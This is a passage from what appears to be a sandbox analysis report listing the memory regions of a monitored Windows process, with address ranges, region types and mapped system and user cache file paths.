"c:\\windows\\system32\\oleaccrc.dll") Region: id = 420 start_va = 0x21e0000 end_va = 0x21e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021e0000" filename = "" Region: id = 421 start_va = 0x21f0000 end_va = 0x21f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 422 start_va = 0x2200000 end_va = 0x2201fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002200000" filename = "" Region: id = 423 start_va = 0x2210000 end_va = 0x2211fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 424 start_va = 0x2220000 end_va = 0x2221fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002220000" filename = "" Region: id = 425 start_va = 0x2230000 end_va = 0x2231fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002230000" filename = "" Region: id = 426 start_va = 0x2250000 end_va = 0x2251fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 427 start_va = 0x2260000 end_va = 0x2260fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 428 start_va = 0x2280000 end_va = 0x2283fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 429 start_va = 0x2290000 end_va = 0x2290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 430 start_va = 0x22a0000 end_va = 0x22a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022a0000" filename = "" Region: id = 431 start_va = 0x22b0000 end_va = 0x22bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 432 start_va = 0x22c0000 end_va = 0x25f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 433 start_va = 0x2600000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 434 start_va = 0x2680000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 435 start_va = 0x2700000 end_va = 0x2701fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002700000" filename = "" Region: id = 436 start_va = 0x2710000 end_va = 0x2713fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 437 start_va = 0x2730000 end_va = 0x2730fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{e23b5da4-e3a9-461b-8050-8e471867b572}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{E23B5DA4-E3A9-461B-8050-8E471867B572}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{e23b5da4-e3a9-461b-8050-8e471867b572}.2.ver0x0000000000000001.db") Region: id = 438 start_va = 0x2740000 end_va = 0x2741fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 439 start_va = 0x2750000 end_va = 0x2751fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002750000" filename = "" Region: id = 440 start_va = 0x2760000 end_va = 0x2761fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 441 start_va = 0x2770000 end_va = 0x2770fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 442 start_va = 0x2780000 end_va = 0x285ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 443 start_va = 0x2860000 end_va = 0x295ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 444 start_va = 0x2960000 end_va = 0x29dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 445 start_va = 0x29e0000 end_va = 0x2a9bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029e0000" filename = "" Region: id = 446 start_va = 0x2aa0000 end_va = 0x2b9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002aa0000" filename = "" Region: id = 447 start_va = 0x2ba0000 end_va = 0x3bdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 448 start_va = 0x3be0000 end_va = 0x3be0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003be0000" filename = "" Region: id = 449 start_va = 0x3bf0000 end_va = 0x3bf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003bf0000" filename = "" Region: id = 450 start_va = 0x3c00000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 451 start_va = 0x3c80000 end_va = 0x3c81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c80000" filename = "" Region: id = 452 start_va = 0x3c90000 end_va = 0x3c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 453 start_va = 0x3ca0000 end_va = 0x3ca0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ca0000" filename = "" Region: id = 454 start_va = 0x3cb0000 end_va = 0x3cb3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 455 start_va = 0x3cc0000 end_va = 0x3dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 456 start_va = 0x3dc0000 end_va = 0x3dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003dc0000" filename = "" Region: id = 457 start_va = 0x3dd0000 end_va = 0x3ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003dd0000" filename = "" Region: id = 458 start_va = 0x3de0000 end_va = 0x3deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003de0000" filename = "" Region: id = 459 start_va = 0x3df0000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003df0000" filename = "" Region: id = 460 start_va = 0x3e00000 end_va = 0x3e00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 461 start_va = 0x3e10000 end_va = 0x3e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 462 start_va = 0x3e20000 end_va = 0x3e20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e20000" filename = "" Region: id = 463 start_va = 0x3e30000 end_va = 0x3e33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 464 start_va = 0x3e40000 end_va = 0x3e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 465 start_va = 0x3e50000 end_va = 0x3e50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e50000" filename = "" Region: id = 466 start_va = 0x3e60000 end_va = 0x3e60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 467 start_va = 0x3e70000 end_va = 0x3e71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e70000" filename = "" Region: id = 468 start_va = 0x3e80000 end_va = 0x3eb8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e80000" filename = "" Region: id = 469 start_va = 0x3ec0000 end_va = 0x3ec0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 470 start_va = 0x3ed0000 end_va = 0x3ed0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 471 start_va = 0x3ee0000 end_va = 0x3ee1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 472 start_va = 0x3ef0000 end_va = 0x3f37fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 473 start_va = 0x3f50000 end_va = 0x3f51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f50000" filename = "" Region: id = 474 start_va = 0x3f60000 end_va = 0x3f63fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 475 start_va = 0x3f70000 end_va = 0x3fb4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 476 start_va = 0x3fc0000 end_va = 0x3fc3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 477 start_va = 0x3fd0000 end_va = 0x405dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 478 start_va = 0x4060000 end_va = 0x40dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004060000" filename = "" Region: id = 479 start_va = 0x40e0000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 480 start_va = 0x4160000 end_va = 0x41dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 481 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 482 start_va = 0x41f0000 end_va = 0x41f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 483 start_va = 0x4200000 end_va = 0x4200fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 484 start_va = 0x4210000 end_va = 0x4210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 485 start_va = 0x4220000 end_va = 0x4228fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004220000" filename = "" Region: id = 486 start_va = 0x4230000 end_va = 0x4233fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 487 start_va = 0x4240000 end_va = 0x4240fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{5c9e180f-34bb-4f92-8676-68c88e410c2b}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{5C9E180F-34BB-4F92-8676-68C88E410C2B}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{5c9e180f-34bb-4f92-8676-68c88e410c2b}.2.ver0x0000000000000001.db") Region: id = 488 start_va = 0x4250000 end_va = 0x4253fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 489 start_va = 0x4260000 end_va = 0x4268fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004260000" filename = "" Region: id = 490 start_va = 0x4270000 end_va = 0x42effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004270000" filename = "" Region: id = 491 start_va = 0x42f0000 end_va = 0x42f0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{0fa68fff-8d1f-4fcc-b2fc-0c8384cf8d69}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{0FA68FFF-8D1F-4FCC-B2FC-0C8384CF8D69}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{0fa68fff-8d1f-4fcc-b2fc-0c8384cf8d69}.2.ver0x0000000000000001.db") Region: id = 492 start_va = 0x4300000 end_va = 0x4303fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 493 start_va = 0x4310000 end_va = 0x4310fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3ec13d2a-c75f-4a0a-9855-0b415d40999c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{3EC13D2A-C75F-4A0A-9855-0B415D40999C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{3ec13d2a-c75f-4a0a-9855-0b415d40999c}.2.ver0x0000000000000001.db") Region: id = 494 start_va = 0x4320000 end_va = 0x4337fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000d.db") Region: id = 495 start_va = 0x4340000 end_va = 0x4341fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 496 start_va = 0x4350000 end_va = 0x4350fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_256.db") Region: id = 497 start_va = 0x4360000 end_va = 0x4367fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 498 start_va = 0x4370000 end_va = 0x43effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 499 start_va = 0x43f0000 end_va = 0x446ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043f0000" filename = "" Region: id = 500 start_va = 0x4470000 end_va = 0x4961fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004470000" filename = "" Region: id = 501 start_va = 0x4970000 end_va = 0x4971fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004970000" filename = "" Region: id = 502 start_va = 0x4980000 end_va = 0x4981fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "inputswitch.dll.mui" filename = "\\Windows\\System32\\en-US\\InputSwitch.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\inputswitch.dll.mui") Region: id = 503 start_va = 0x4990000 end_va = 0x4d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004990000" filename = "" Region: id = 504 start_va = 0x4d90000 end_va = 0x4d90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d90000" filename = "" Region: id = 505 start_va = 0x4da0000 end_va = 0x4da1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004da0000" filename = "" Region: id = 506 start_va = 0x4db0000 end_va = 0x4db1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004db0000" filename = "" Region: id = 507 start_va = 0x4dc0000 end_va = 0x4dc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004dc0000" filename = "" Region: id = 508 start_va = 0x4dd0000 end_va = 0x4dd1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004dd0000" filename = "" Region: id = 509 start_va = 0x4df0000 end_va = 0x4df2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004df0000" filename = "" Region: id = 510 start_va = 0x4e00000 end_va = 0x4e14fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 511 start_va = 0x4e20000 end_va = 0x4e21fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 512 start_va = 0x4e30000 end_va = 0x4e30fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 513 start_va = 0x4e40000 end_va = 0x4e41fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 514 start_va = 0x4e50000 end_va = 0x4e51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e50000" filename = "" Region: id = 515 start_va = 0x4e60000 end_va = 0x4e61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e60000" filename = "" Region: id = 516 start_va = 0x4e70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e70000" filename = "" Region: id = 517 start_va = 0x4f70000 end_va = 0x4f70fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 518 start_va = 0x4f80000 end_va = 0x4f81fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 519 start_va = 0x4f90000 end_va = 0x4f9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f90000" filename = "" Region: id = 520 start_va = 0x4fa0000 end_va = 0x4fa4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 521 start_va = 0x4fb0000 end_va = 0x4fbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 522 start_va = 0x4ff0000 end_va = 0x4ff0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ff0000" filename = "" Region: id = 523 start_va = 0x5010000 end_va = 0x5010fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005010000" filename = "" Region: id = 524 start_va = 0x5100000 end_va = 0x5101fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005100000" filename = "" Region: id = 525 start_va = 0x5110000 end_va = 0x5157fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005110000" filename = "" Region: id = 526 start_va = 0x5170000 end_va = 0x5170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005170000" filename = "" Region: id = 527 start_va = 0x5180000 end_va = 0x5181fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005180000" filename = "" Region: id = 528 start_va = 0x5190000 end_va = 0x5191fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005190000" filename = "" Region: id = 529 start_va = 0x51a0000 end_va = 0x51a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000051a0000" filename = "" Region: id = 530 start_va = 0x51b0000 end_va = 0x51b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 531 start_va = 0x51e0000 end_va = 0x51e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000051e0000" filename = "" Region: id = 532 start_va = 0x51f0000 end_va = 0x5237fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051f0000" filename = "" Region: id = 533 start_va = 0x5240000 end_va = 0x52bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 534 start_va = 0x52c0000 end_va = 0x5478fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 535 start_va = 0x5480000 end_va = 0x54fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005480000" filename = "" Region: id = 536 start_va = 0x5500000 end_va = 0x557ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 537 start_va = 0x5580000 end_va = 0x5d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005580000" filename = "" Region: id = 538 start_va = 0x5d80000 end_va = 0x5dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d80000" filename = "" Region: id = 539 start_va = 0x5e00000 end_va = 0x5e48fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e00000" filename = "" Region: id = 540 start_va = 0x5e50000 end_va = 0x81d1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "appdb.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Notifications\\appdb.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\notifications\\appdb.dat") Region: id = 541 start_va = 0x81f0000 end_va = 0x81f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000081f0000" filename = "" Region: id = 542 start_va = 0x8200000 end_va = 0x8200fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008200000" filename = "" Region: id = 543 start_va = 0x8210000 end_va = 0x8210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008210000" filename = "" Region: id = 544 start_va = 0x8220000 end_va = 0x8221fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008220000" filename = "" Region: id = 545 start_va = 0x8230000 end_va = 0x8231fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008230000" filename = "" Region: id = 546 start_va = 0x8240000 end_va = 0x8241fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008240000" filename = "" Region: id = 547 start_va = 0x8250000 end_va = 0x8251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008250000" filename = "" Region: id = 548 start_va = 0x8260000 end_va = 0x837cfff monitored = 0 entry_point = 0x8261cc0 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 549 start_va = 0x8460000 end_va = 0x865ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008460000" filename = "" Region: id = 550 start_va = 0x8690000 end_va = 0x878ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 551 start_va = 0x87a0000 end_va = 0x87affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087a0000" filename = "" Region: id = 552 start_va = 0x87f0000 end_va = 0x88effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 553 start_va = 0x89e0000 end_va = 0x8a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089e0000" filename = "" Region: id = 554 start_va = 0x8a60000 end_va = 0x8adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a60000" filename = "" Region: id = 555 start_va = 0x8b60000 end_va = 0x8bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b60000" filename = "" Region: id = 556 start_va = 0x8c60000 end_va = 0x8cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c60000" filename = "" Region: id = 557 start_va = 0x8d60000 end_va = 0x8ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d60000" filename = "" Region: id = 558 start_va = 